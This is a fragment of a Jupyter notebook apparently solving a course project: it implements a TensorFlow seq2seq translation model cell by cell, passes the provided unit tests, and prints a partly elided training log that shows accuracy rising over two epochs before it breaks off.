"def model_inputs():\n \"\"\"\n Create TF Placeholders for input, targets, and learning rate.\n :return: Tuple (input, targets, learning rate, keep probability)\n \"\"\"\n # TODO: Implement Function\n inputs=tf.placeholder(tf.int32,[None,None],name='input')\n targets=tf.placeholder(tf.int32,[None,None],name='target')\n learning_rate=tf.placeholder(tf.float32,name=\"learning_rate\")\n keep_prob=tf.placeholder(tf.float32,name=\"keep_prob\")\n return inputs, targets, learning_rate, keep_prob\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_model_inputs(model_inputs)",
"Tests Passed\n"
]
],
[
[
"### Process Decoding Input\nImplement `process_decoding_input` using TensorFlow to remove the last word id from each batch in `target_data` and concat the GO ID to the beginning of each batch.",
"_____no_output_____"
]
],
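[
[
"As a concrete illustration with hypothetical toy ids (not from the real vocabulary): given a target batch `[[10, 11, 12, 3]]` where `3` is `<EOS>` and `1` is `<GO>`, the preprocessed decoder input becomes `[[1, 10, 11, 12]]`: the last id of each sequence is dropped and the `<GO>` id is prepended.",
"_____no_output_____"
]
],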
[
[
"def process_decoding_input(target_data, target_vocab_to_int, batch_size):\n \"\"\"\n Preprocess target data for decoding\n :param target_data: Target Placeholder\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :param batch_size: Batch Size\n :return: Preprocessed target data\n \"\"\"\n # TODO: Implement Function\n last=tf.strided_slice(target_data,[0,0],[batch_size,-1],[1,1])\n target_data=tf.concat([tf.fill([batch_size, 1], target_vocab_to_int['<GO>']), last], 1)\n return target_data\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_process_decoding_input(process_decoding_input)",
"Tests Passed\n"
]
],
[
[
"### Encoding\nImplement `encoding_layer()` to create a Encoder RNN layer using [`tf.nn.dynamic_rnn()`](https://www.tensorflow.org/api_docs/python/tf/nn/dynamic_rnn).",
"_____no_output_____"
]
],
[
[
"def encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob):\n \"\"\"\n Create encoding layer\n :param rnn_inputs: Inputs for the RNN\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param keep_prob: Dropout keep probability\n :return: RNN state\n \"\"\"\n # TODO: Implement Function\n lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)\n cell = tf.contrib.rnn.MultiRNNCell([lstm]*num_layers)\n cell = tf.contrib.rnn.DropoutWrapper(cell,output_keep_prob=keep_prob)\n output, rnn_state = tf.nn.dynamic_rnn(cell,rnn_inputs,dtype=tf.float32)\n return rnn_state\n \n #Above code was throwing a ValueError for version 1.1.0: \n # Attempt to reuse RNNCell with a different variable\n # scope than its first use\n # for the above code\n #multicell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.BasicLSTMCell(rnn_size),\\\n # output_keep_prob=keep_prob) for _ in range(num_layers)])\n #outputs,state=tf.nn.dynamic_rnn(multicell,rnn_inputs,dtype=tf.float32)\n #return state\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_encoding_layer(encoding_layer)",
"Tests Passed\n"
]
],
[
[
"### Decoding - Training\nCreate training logits using [`tf.contrib.seq2seq.simple_decoder_fn_train()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/simple_decoder_fn_train) and [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder). Apply the `output_fn` to the [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder) outputs.",
"_____no_output_____"
]
],
[
[
"def decoding_layer_train(encoder_state, dec_cell, dec_embed_input, sequence_length, decoding_scope,\n output_fn, keep_prob):\n \"\"\"\n Create a decoding layer for training\n :param encoder_state: Encoder State\n :param dec_cell: Decoder RNN Cell\n :param dec_embed_input: Decoder embedded input\n :param sequence_length: Sequence Length\n :param decoding_scope: TenorFlow Variable Scope for decoding\n :param output_fn: Function to apply the output layer\n :param keep_prob: Dropout keep probability\n :return: Train Logits\n \"\"\"\n # TODO: Implement Function\n decoder_fn_train = tf.contrib.seq2seq.simple_decoder_fn_train(encoder_state)\n outputs,final_state,final_context_state = tf.contrib.seq2seq.dynamic_rnn_decoder\\\n (dec_cell,decoder_fn_train,dec_embed_input,sequence_length,scope=decoding_scope)\n \n train_logits = output_fn(outputs)\n train_logits = tf.nn.dropout(train_logits,keep_prob)\n \n return train_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer_train(decoding_layer_train)",
"Tests Passed\n"
]
],
[
[
"### Decoding - Inference\nCreate inference logits using [`tf.contrib.seq2seq.simple_decoder_fn_inference()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/simple_decoder_fn_inference) and [`tf.contrib.seq2seq.dynamic_rnn_decoder()`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/seq2seq/dynamic_rnn_decoder). ",
"_____no_output_____"
]
],
[
[
"def decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id, end_of_sequence_id,\n maximum_length, vocab_size, decoding_scope, output_fn, keep_prob):\n \"\"\"\n Create a decoding layer for inference\n :param encoder_state: Encoder state\n :param dec_cell: Decoder RNN Cell\n :param dec_embeddings: Decoder embeddings\n :param start_of_sequence_id: GO ID\n :param end_of_sequence_id: EOS Id\n :param maximum_length: The maximum allowed time steps to decode\n :param vocab_size: Size of vocabulary\n :param decoding_scope: TensorFlow Variable Scope for decoding\n :param output_fn: Function to apply the output layer\n :param keep_prob: Dropout keep probability\n :return: Inference Logits\n \"\"\"\n # TODO: Implement Function\n decoder_fn_inference = tf.contrib.seq2seq.simple_decoder_fn_inference\\\n (output_fn,encoder_state,dec_embeddings,start_of_sequence_id,end_of_sequence_id,maximum_length,vocab_size)\n \n outputs_logits,_,_ = tf.contrib.seq2seq.dynamic_rnn_decoder\\\n (dec_cell,decoder_fn_inference,scope=decoding_scope)\n \n inference_logits = tf.nn.dropout(outputs_logits, tf.to_float(keep_prob))\n \n return inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer_infer(decoding_layer_infer)",
"Tests Passed\n"
]
],
[
[
"### Build the Decoding Layer\nImplement `decoding_layer()` to create a Decoder RNN layer.\n\n- Create RNN cell for decoding using `rnn_size` and `num_layers`.\n- Create the output fuction using [`lambda`](https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions) to transform it's input, logits, to class logits.\n- Use the your `decoding_layer_train(encoder_state, dec_cell, dec_embed_input, sequence_length, decoding_scope, output_fn, keep_prob)` function to get the training logits.\n- Use your `decoding_layer_infer(encoder_state, dec_cell, dec_embeddings, start_of_sequence_id, end_of_sequence_id, maximum_length, vocab_size, decoding_scope, output_fn, keep_prob)` function to get the inference logits.\n\nNote: You'll need to use [tf.variable_scope](https://www.tensorflow.org/api_docs/python/tf/variable_scope) to share variables between training and inference.",
"_____no_output_____"
]
],
[
[
"def decoding_layer(dec_embed_input, dec_embeddings, encoder_state, vocab_size, sequence_length, rnn_size,\n num_layers, target_vocab_to_int, keep_prob):\n \"\"\"\n Create decoding layer\n :param dec_embed_input: Decoder embedded input\n :param dec_embeddings: Decoder embeddings\n :param encoder_state: The encoded state\n :param vocab_size: Size of vocabulary\n :param sequence_length: Sequence Length\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :param keep_prob: Dropout keep probability\n :return: Tuple of (Training Logits, Inference Logits)\n \"\"\"\n # TODO: Implement Function\n #Decoding rnn cell \n dec_cell = tf.contrib.rnn.BasicLSTMCell(rnn_size)\n dec_cell = tf.contrib.rnn.DropoutWrapper(dec_cell,output_keep_prob=keep_prob)\n dec_cell = tf.contrib.rnn.MultiRNNCell([dec_cell] * num_layers)\n \n #transforming it's input, logits, to class logits\n with tf.variable_scope('decoding') as decoding_scope:\n output_fn = lambda x: tf.contrib.layers.fully_connected(x,vocab_size,None,scope=decoding_scope)\n \n #getting the training logits\n training_logits = decoding_layer_train(encoder_state,dec_cell,dec_embed_input,\\\n sequence_length,decoding_scope,output_fn,keep_prob)\n #getting the inference logits\n with tf.variable_scope(\"decoding\", reuse=True) as decoding_scope:\n inference_logits = decoding_layer_infer\\\n (encoder_state,dec_cell,dec_embeddings,target_vocab_to_int['<GO>'],target_vocab_to_int['<EOS>'],\\\n sequence_length,vocab_size,decoding_scope,output_fn,keep_prob) \n \n return training_logits,inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_decoding_layer(decoding_layer)",
"Tests Passed\n"
]
],
[
[
"### Build the Neural Network\nApply the functions you implemented above to:\n\n- Apply embedding to the input data for the encoder.\n- Encode the input using your `encoding_layer(rnn_inputs, rnn_size, num_layers, keep_prob)`.\n- Process target data using your `process_decoding_input(target_data, target_vocab_to_int, batch_size)` function.\n- Apply embedding to the target data for the decoder.\n- Decode the encoded input using your `decoding_layer(dec_embed_input, dec_embeddings, encoder_state, vocab_size, sequence_length, rnn_size, num_layers, target_vocab_to_int, keep_prob)`.",
"_____no_output_____"
]
],
[
[
"def seq2seq_model(input_data, target_data, keep_prob, batch_size, sequence_length, source_vocab_size, target_vocab_size,\n enc_embedding_size, dec_embedding_size, rnn_size, num_layers, target_vocab_to_int):\n \"\"\"\n Build the Sequence-to-Sequence part of the neural network\n :param input_data: Input placeholder\n :param target_data: Target placeholder\n :param keep_prob: Dropout keep probability placeholder\n :param batch_size: Batch Size\n :param sequence_length: Sequence Length\n :param source_vocab_size: Source vocabulary size\n :param target_vocab_size: Target vocabulary size\n :param enc_embedding_size: Decoder embedding size\n :param dec_embedding_size: Encoder embedding size\n :param rnn_size: RNN Size\n :param num_layers: Number of layers\n :param target_vocab_to_int: Dictionary to go from the target words to an id\n :return: Tuple of (Training Logits, Inference Logits)\n \"\"\"\n # TODO: Implement Function\n #Applying embedding to the input data for the encoder\n encoding_input = tf.contrib.layers.embed_sequence(input_data,source_vocab_size,enc_embedding_size)\n \n #Encoding the input\n encoder_state = encoding_layer(encoding_input,rnn_size,num_layers,keep_prob)\n \n #Process target data\n target_data = process_decoding_input(target_data,target_vocab_to_int,batch_size)\n \n #Appling embedding to the target data for the decoder\n dec_embeddings = tf.Variable(tf.random_uniform([target_vocab_size, dec_embedding_size]))\n dec_embed_input = tf.nn.embedding_lookup(dec_embeddings, target_data)\n \n #Decoding the encoded input\n training_logits,inference_logits = decoding_layer\\\n (dec_embed_input,dec_embeddings,encoder_state,target_vocab_size,sequence_length,rnn_size,num_layers,\\\n target_vocab_to_int,keep_prob)\n\n return training_logits,inference_logits\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_seq2seq_model(seq2seq_model)",
"Tests Passed\n"
]
],
[
[
"## Neural Network Training\n### Hyperparameters\nTune the following parameters:\n\n- Set `epochs` to the number of epochs.\n- Set `batch_size` to the batch size.\n- Set `rnn_size` to the size of the RNNs.\n- Set `num_layers` to the number of layers.\n- Set `encoding_embedding_size` to the size of the embedding for the encoder.\n- Set `decoding_embedding_size` to the size of the embedding for the decoder.\n- Set `learning_rate` to the learning rate.\n- Set `keep_probability` to the Dropout keep probability",
"_____no_output_____"
]
],
[
[
"# Number of Epochs\nepochs = 3 #10\n# Batch Size\nbatch_size = 256\n# RNN Size\nrnn_size = 256\n# Number of Layers\nnum_layers = 2\n# Embedding Size\nencoding_embedding_size = 200\ndecoding_embedding_size = 200\n# Learning Rate\nlearning_rate = 0.01 #0.001\n# Dropout Keep Probability\nkeep_probability = 0.8",
"_____no_output_____"
]
],
[
[
"### Build the Graph\nBuild the graph using the neural network you implemented.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nsave_path = 'checkpoints/dev'\n(source_int_text, target_int_text), (source_vocab_to_int, target_vocab_to_int), _ = helper.load_preprocess()\nmax_source_sentence_length = max([len(sentence) for sentence in source_int_text])\n\ntrain_graph = tf.Graph()\nwith train_graph.as_default():\n input_data, targets, lr, keep_prob = model_inputs()\n sequence_length = tf.placeholder_with_default(max_source_sentence_length, None, name='sequence_length')\n input_shape = tf.shape(input_data)\n \n train_logits, inference_logits = seq2seq_model(\n tf.reverse(input_data, [-1]), targets, keep_prob, batch_size, sequence_length, len(source_vocab_to_int), len(target_vocab_to_int),\n encoding_embedding_size, decoding_embedding_size, rnn_size, num_layers, target_vocab_to_int)\n\n tf.identity(inference_logits, 'logits')\n with tf.name_scope(\"optimization\"):\n # Loss function\n cost = tf.contrib.seq2seq.sequence_loss(\n train_logits,\n targets,\n tf.ones([input_shape[0], sequence_length]))\n\n # Optimizer\n optimizer = tf.train.AdamOptimizer(lr)\n\n # Gradient Clipping\n gradients = optimizer.compute_gradients(cost)\n capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]\n train_op = optimizer.apply_gradients(capped_gradients)",
"_____no_output_____"
]
],
[
[
"### Train\nTrain the neural network on the preprocessed data. If you have a hard time getting a good loss, check the forums to see if anyone is having the same problem.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport time\n\ndef get_accuracy(target, logits):\n \"\"\"\n Calculate accuracy\n \"\"\"\n max_seq = max(target.shape[1], logits.shape[1])\n if max_seq - target.shape[1]:\n target = np.pad(\n target,\n [(0,0),(0,max_seq - target.shape[1])],\n 'constant')\n if max_seq - logits.shape[1]:\n logits = np.pad(\n logits,\n [(0,0),(0,max_seq - logits.shape[1]), (0,0)],\n 'constant')\n\n return np.mean(np.equal(target, np.argmax(logits, 2)))\n\ntrain_source = source_int_text[batch_size:]\ntrain_target = target_int_text[batch_size:]\n\nvalid_source = helper.pad_sentence_batch(source_int_text[:batch_size])\nvalid_target = helper.pad_sentence_batch(target_int_text[:batch_size])\n\nwith tf.Session(graph=train_graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n for epoch_i in range(epochs):\n for batch_i, (source_batch, target_batch) in enumerate(\n helper.batch_data(train_source, train_target, batch_size)):\n start_time = time.time()\n \n _, loss = sess.run(\n [train_op, cost],\n {input_data: source_batch,\n targets: target_batch,\n lr: learning_rate,\n sequence_length: target_batch.shape[1],\n keep_prob: keep_probability})\n \n batch_train_logits = sess.run(\n inference_logits,\n {input_data: source_batch, keep_prob: 1.0})\n batch_valid_logits = sess.run(\n inference_logits,\n {input_data: valid_source, keep_prob: 1.0})\n \n train_acc = get_accuracy(target_batch, batch_train_logits)\n valid_acc = get_accuracy(np.array(valid_target), batch_valid_logits)\n end_time = time.time()\n print('Epoch {:>3} Batch {:>4}/{} - Train Accuracy: {:>6.3f}, Validation Accuracy: {:>6.3f}, Loss: {:>6.3f}'\n .format(epoch_i, batch_i, len(source_int_text) // batch_size, train_acc, valid_acc, loss))\n\n # Save Model\n saver = tf.train.Saver()\n saver.save(sess, save_path)\n print('Model Trained and Saved')",
"Epoch 0 Batch 0/538 - Train Accuracy: 0.234, Validation Accuracy: 0.316, Loss: 5.901\nEpoch 0 Batch 1/538 - Train Accuracy: 0.169, Validation Accuracy: 0.238, Loss: 4.838\nEpoch 0 Batch 2/538 - Train Accuracy: 0.165, Validation Accuracy: 0.238, Loss: 5.141\nEpoch 0 Batch 3/538 - Train Accuracy: 0.241, Validation Accuracy: 0.328, Loss: 4.593\nEpoch 0 Batch 4/538 - Train Accuracy: 0.185, Validation Accuracy: 0.253, Loss: 4.467\nEpoch 0 Batch 5/538 - Train Accuracy: 0.304, Validation Accuracy: 0.350, Loss: 4.247\nEpoch 0 Batch 6/538 - Train Accuracy: 0.312, Validation Accuracy: 0.353, Loss: 3.992\nEpoch 0 Batch 7/538 - Train Accuracy: 0.287, Validation Accuracy: 0.352, Loss: 3.988\nEpoch 0 Batch 8/538 - Train Accuracy: 0.284, Validation Accuracy: 0.352, Loss: 3.918\nEpoch 0 Batch 9/538 - Train Accuracy: 0.286, Validation Accuracy: 0.352, Loss: 3.891\nEpoch 0 Batch 10/538 - Train Accuracy: 0.267, Validation Accuracy: 0.352, Loss: 3.911\nEpoch 0 Batch 11/538 - Train Accuracy: 0.279, Validation Accuracy: 0.352, Loss: 3.832\nEpoch 0 Batch 12/538 - Train Accuracy: 0.277, Validation Accuracy: 0.353, Loss: 3.777\nEpoch 0 Batch 13/538 - Train Accuracy: 0.355, Validation Accuracy: 0.382, Loss: 3.552\nEpoch 0 Batch 14/538 - Train Accuracy: 0.321, Validation Accuracy: 0.385, Loss: 3.612\nEpoch 0 Batch 15/538 - Train Accuracy: 0.363, Validation Accuracy: 0.389, Loss: 3.513\nEpoch 0 Batch 16/538 - Train Accuracy: 0.347, Validation Accuracy: 0.388, Loss: 3.487\nEpoch 0 Batch 17/538 - Train Accuracy: 0.334, Validation Accuracy: 0.393, Loss: 3.537\nEpoch 0 Batch 18/538 - Train Accuracy: 0.322, Validation Accuracy: 0.390, Loss: 3.559\nEpoch 0 Batch 19/538 - Train Accuracy: 0.328, Validation Accuracy: 0.397, Loss: 3.527\nEpoch 0 Batch 20/538 - Train Accuracy: 0.375, Validation Accuracy: 0.414, Loss: 3.404\nEpoch 0 Batch 21/538 - Train Accuracy: 0.308, Validation Accuracy: 0.406, Loss: 3.532\nEpoch 0 Batch 22/538 - Train Accuracy: 0.343, Validation Accuracy: 0.406, Loss: 3.433\nEpoch 0 Batch 23/538 - Train Accuracy: 0.353, Validation Accuracy: 0.410, Loss: 3.431\nEpoch 0 Batch 24/538 - Train Accuracy: 0.379, Validation Accuracy: 0.417, Loss: 3.336\nEpoch 0 Batch 25/538 - Train Accuracy: 0.368, Validation Accuracy: 0.421, Loss: 3.321\nEpoch 0 Batch 26/538 - Train Accuracy: 0.377, Validation Accuracy: 0.435, Loss: 3.348\nEpoch 0 Batch 27/538 - Train Accuracy: 0.384, Validation Accuracy: 0.433, Loss: 3.347\nEpoch 0 Batch 28/538 - Train Accuracy: 0.433, Validation Accuracy: 0.437, Loss: 3.119\nEpoch 0 Batch 29/538 - Train Accuracy: 0.403, Validation Accuracy: 0.445, Loss: 3.212\nEpoch 0 Batch 30/538 - Train Accuracy: 0.392, Validation Accuracy: 0.456, Loss: 3.302\nEpoch 0 Batch 31/538 - Train Accuracy: 0.426, Validation Accuracy: 0.458, Loss: 3.131\nEpoch 0 Batch 32/538 - Train Accuracy: 0.419, Validation Accuracy: 0.472, Loss: 3.183\nEpoch 0 Batch 33/538 - Train Accuracy: 0.423, Validation Accuracy: 0.463, Loss: 3.086\nEpoch 0 Batch 34/538 - Train Accuracy: 0.422, Validation Accuracy: 0.476, Loss: 3.176\nEpoch 0 Batch 35/538 - Train Accuracy: 0.409, Validation Accuracy: 0.471, Loss: 3.150\nEpoch 0 Batch 36/538 - Train Accuracy: 0.435, Validation Accuracy: 0.476, Loss: 3.009\nEpoch 0 Batch 37/538 - Train Accuracy: 0.450, Validation Accuracy: 0.487, Loss: 3.045\nEpoch 0 Batch 38/538 - Train Accuracy: 0.429, Validation Accuracy: 0.491, Loss: 3.101\nEpoch 0 Batch 39/538 - Train Accuracy: 0.438, Validation Accuracy: 0.494, Loss: 3.058\nEpoch 0 Batch 40/538 - Train Accuracy: 0.499, Validation Accuracy: 0.498, Loss: 
2.849\nEpoch 0 Batch 41/538 - Train Accuracy: 0.435, Validation Accuracy: 0.497, Loss: 3.053\nEpoch 0 Batch 42/538 - Train Accuracy: 0.437, Validation Accuracy: 0.488, Loss: 2.964\nEpoch 0 Batch 43/538 - Train Accuracy: 0.474, Validation Accuracy: 0.512, Loss: 2.975\nEpoch 0 Batch 44/538 - Train Accuracy: 0.441, Validation Accuracy: 0.504, Loss: 3.028\nEpoch 0 Batch 45/538 - Train Accuracy: 0.466, Validation Accuracy: 0.499, Loss: 2.831\nEpoch 0 Batch 46/538 - Train Accuracy: 0.464, Validation Accuracy: 0.506, Loss: 2.915\nEpoch 0 Batch 47/538 - Train Accuracy: 0.484, Validation Accuracy: 0.509, Loss: 2.832\nEpoch 0 Batch 48/538 - Train Accuracy: 0.472, Validation Accuracy: 0.493, Loss: 2.745\nEpoch 0 Batch 49/538 - Train Accuracy: 0.457, Validation Accuracy: 0.512, Loss: 2.908\nEpoch 0 Batch 50/538 - Train Accuracy: 0.484, Validation Accuracy: 0.516, Loss: 2.791\nEpoch 0 Batch 51/538 - Train Accuracy: 0.384, Validation Accuracy: 0.499, Loss: 2.945\nEpoch 0 Batch 52/538 - Train Accuracy: 0.474, Validation Accuracy: 0.518, Loss: 2.764\nEpoch 0 Batch 53/538 - Train Accuracy: 0.514, Validation Accuracy: 0.522, Loss: 2.604\nEpoch 0 Batch 54/538 - Train Accuracy: 0.452, Validation Accuracy: 0.510, Loss: 2.689\nEpoch 0 Batch 55/538 - Train Accuracy: 0.455, Validation Accuracy: 0.515, Loss: 2.767\nEpoch 0 Batch 56/538 - Train Accuracy: 0.489, Validation Accuracy: 0.526, Loss: 2.675\nEpoch 0 Batch 57/538 - Train Accuracy: 0.448, Validation Accuracy: 0.525, Loss: 2.727\nEpoch 0 Batch 58/538 - Train Accuracy: 0.439, Validation Accuracy: 0.515, Loss: 2.701\nEpoch 0 Batch 59/538 - Train Accuracy: 0.469, Validation Accuracy: 0.529, Loss: 2.613\nEpoch 0 Batch 60/538 - Train Accuracy: 0.475, Validation Accuracy: 0.527, Loss: 2.561\nEpoch 0 Batch 61/538 - Train Accuracy: 0.459, Validation Accuracy: 0.520, Loss: 2.545\nEpoch 0 Batch 62/538 - Train Accuracy: 0.499, Validation Accuracy: 0.529, Loss: 2.485\nEpoch 0 Batch 63/538 - Train Accuracy: 0.494, Validation Accuracy: 0.531, Loss: 2.403\nEpoch 0 Batch 64/538 - Train Accuracy: 0.486, Validation Accuracy: 0.514, Loss: 2.413\nEpoch 0 Batch 65/538 - Train Accuracy: 0.459, Validation Accuracy: 0.530, Loss: 2.468\nEpoch 0 Batch 66/538 - Train Accuracy: 0.506, Validation Accuracy: 0.538, Loss: 2.306\nEpoch 0 Batch 67/538 - Train Accuracy: 0.497, Validation Accuracy: 0.522, Loss: 2.400\nEpoch 0 Batch 68/538 - Train Accuracy: 0.505, Validation Accuracy: 0.528, Loss: 2.223\nEpoch 0 Batch 69/538 - Train Accuracy: 0.438, Validation Accuracy: 0.493, Loss: 2.302\nEpoch 0 Batch 70/538 - Train Accuracy: 0.445, Validation Accuracy: 0.481, Loss: 2.247\nEpoch 0 Batch 71/538 - Train Accuracy: 0.426, Validation Accuracy: 0.481, Loss: 2.220\nEpoch 0 Batch 72/538 - Train Accuracy: 0.462, Validation Accuracy: 0.480, Loss: 2.104\nEpoch 0 Batch 73/538 - Train Accuracy: 0.413, Validation Accuracy: 0.474, Loss: 2.194\nEpoch 0 Batch 74/538 - Train Accuracy: 0.465, Validation Accuracy: 0.485, Loss: 2.082\nEpoch 0 Batch 75/538 - Train Accuracy: 0.445, Validation Accuracy: 0.454, Loss: 2.097\nEpoch 0 Batch 76/538 - Train Accuracy: 0.414, Validation Accuracy: 0.457, Loss: 2.105\nEpoch 0 Batch 77/538 - Train Accuracy: 0.400, Validation Accuracy: 0.449, Loss: 2.040\nEpoch 0 Batch 78/538 - Train Accuracy: 0.437, Validation Accuracy: 0.450, Loss: 2.047\nEpoch 0 Batch 79/538 - Train Accuracy: 0.425, Validation Accuracy: 0.453, Loss: 1.973\nEpoch 0 Batch 80/538 - Train Accuracy: 0.407, Validation Accuracy: 0.463, Loss: 2.045\nEpoch 0 Batch 81/538 - Train Accuracy: 0.402, Validation Accuracy: 
0.464, Loss: 1.997
Epoch 0 Batch 82/538 - Train Accuracy: 0.482, Validation Accuracy: 0.504, Loss: 1.970
...
Epoch 0 Batch 100/538 - Train Accuracy: 0.526, Validation Accuracy: 0.543, Loss: 1.763
...
Epoch 0 Batch 200/538 - Train Accuracy: 0.654, Validation Accuracy: 0.640, Loss: 1.409
...
Epoch 0 Batch 300/538 - Train Accuracy: 0.739, Validation Accuracy: 0.719, Loss: 1.313
...
Epoch 0 Batch 400/538 - Train Accuracy: 0.789, Validation Accuracy: 0.787, Loss: 1.182
...
Epoch 0 Batch 500/538 - Train Accuracy: 0.858, Validation Accuracy: 0.824, Loss: 1.103
...
Epoch 0 Batch 536/538 - Train Accuracy: 0.842, Validation Accuracy: 0.843, Loss: 1.070
Epoch 1 Batch 0/538 - Train Accuracy: 0.859, Validation Accuracy: 0.859, Loss: 1.076
...
Epoch 1 Batch 100/538 - Train Accuracy: 0.886, Validation Accuracy: 0.891, Loss: 1.016
...
Epoch 1 Batch 200/538 - Train Accuracy: 0.887, Validation Accuracy: 0.900, Loss: 1.015
...
Epoch 1 Batch 300/538 - Train Accuracy: 0.906, Validation Accuracy: 0.913, Loss: 0.945
...
Epoch 1 Batch 392/538 - Train Accuracy: 0.895, Validation Accuracy: 0.912, Loss: 0.936
Epoch 1 Batch 393/538 - 
Train Accuracy: 0.921, Validation Accuracy: 0.913, Loss: 0.895\nEpoch 1 Batch 394/538 - Train Accuracy: 0.900, Validation Accuracy: 0.908, Loss: 0.959\nEpoch 1 Batch 395/538 - Train Accuracy: 0.913, Validation Accuracy: 0.912, Loss: 0.918\nEpoch 1 Batch 396/538 - Train Accuracy: 0.906, Validation Accuracy: 0.909, Loss: 0.942\nEpoch 1 Batch 397/538 - Train Accuracy: 0.929, Validation Accuracy: 0.904, Loss: 0.942\nEpoch 1 Batch 398/538 - Train Accuracy: 0.931, Validation Accuracy: 0.910, Loss: 0.962\nEpoch 1 Batch 399/538 - Train Accuracy: 0.887, Validation Accuracy: 0.909, Loss: 0.965\nEpoch 1 Batch 400/538 - Train Accuracy: 0.909, Validation Accuracy: 0.915, Loss: 0.980\nEpoch 1 Batch 401/538 - Train Accuracy: 0.931, Validation Accuracy: 0.914, Loss: 0.951\nEpoch 1 Batch 402/538 - Train Accuracy: 0.921, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 403/538 - Train Accuracy: 0.936, Validation Accuracy: 0.902, Loss: 0.943\nEpoch 1 Batch 404/538 - Train Accuracy: 0.907, Validation Accuracy: 0.901, Loss: 0.952\nEpoch 1 Batch 405/538 - Train Accuracy: 0.923, Validation Accuracy: 0.905, Loss: 0.950\nEpoch 1 Batch 406/538 - Train Accuracy: 0.900, Validation Accuracy: 0.907, Loss: 0.924\nEpoch 1 Batch 407/538 - Train Accuracy: 0.932, Validation Accuracy: 0.910, Loss: 0.961\nEpoch 1 Batch 408/538 - Train Accuracy: 0.929, Validation Accuracy: 0.915, Loss: 0.923\nEpoch 1 Batch 409/538 - Train Accuracy: 0.903, Validation Accuracy: 0.914, Loss: 0.932\nEpoch 1 Batch 410/538 - Train Accuracy: 0.935, Validation Accuracy: 0.902, Loss: 0.992\nEpoch 1 Batch 411/538 - Train Accuracy: 0.928, Validation Accuracy: 0.907, Loss: 0.927\nEpoch 1 Batch 412/538 - Train Accuracy: 0.921, Validation Accuracy: 0.901, Loss: 0.878\nEpoch 1 Batch 413/538 - Train Accuracy: 0.903, Validation Accuracy: 0.900, Loss: 0.942\nEpoch 1 Batch 414/538 - Train Accuracy: 0.866, Validation Accuracy: 0.903, Loss: 0.972\nEpoch 1 Batch 415/538 - Train Accuracy: 0.904, Validation Accuracy: 0.908, Loss: 0.945\nEpoch 1 Batch 416/538 - Train Accuracy: 0.928, Validation Accuracy: 0.909, Loss: 0.926\nEpoch 1 Batch 417/538 - Train Accuracy: 0.939, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 418/538 - Train Accuracy: 0.916, Validation Accuracy: 0.915, Loss: 0.903\nEpoch 1 Batch 419/538 - Train Accuracy: 0.923, Validation Accuracy: 0.917, Loss: 0.907\nEpoch 1 Batch 420/538 - Train Accuracy: 0.936, Validation Accuracy: 0.916, Loss: 0.961\nEpoch 1 Batch 421/538 - Train Accuracy: 0.919, Validation Accuracy: 0.914, Loss: 0.887\nEpoch 1 Batch 422/538 - Train Accuracy: 0.912, Validation Accuracy: 0.913, Loss: 0.962\nEpoch 1 Batch 423/538 - Train Accuracy: 0.917, Validation Accuracy: 0.911, Loss: 0.953\nEpoch 1 Batch 424/538 - Train Accuracy: 0.911, Validation Accuracy: 0.913, Loss: 0.954\nEpoch 1 Batch 425/538 - Train Accuracy: 0.911, Validation Accuracy: 0.914, Loss: 0.979\nEpoch 1 Batch 426/538 - Train Accuracy: 0.939, Validation Accuracy: 0.913, Loss: 0.927\nEpoch 1 Batch 427/538 - Train Accuracy: 0.912, Validation Accuracy: 0.911, Loss: 0.938\nEpoch 1 Batch 428/538 - Train Accuracy: 0.935, Validation Accuracy: 0.908, Loss: 0.938\nEpoch 1 Batch 429/538 - Train Accuracy: 0.935, Validation Accuracy: 0.912, Loss: 0.919\nEpoch 1 Batch 430/538 - Train Accuracy: 0.919, Validation Accuracy: 0.911, Loss: 0.958\nEpoch 1 Batch 431/538 - Train Accuracy: 0.923, Validation Accuracy: 0.911, Loss: 0.909\nEpoch 1 Batch 432/538 - Train Accuracy: 0.916, Validation Accuracy: 0.904, Loss: 0.938\nEpoch 1 Batch 433/538 - Train Accuracy: 0.916, Validation 
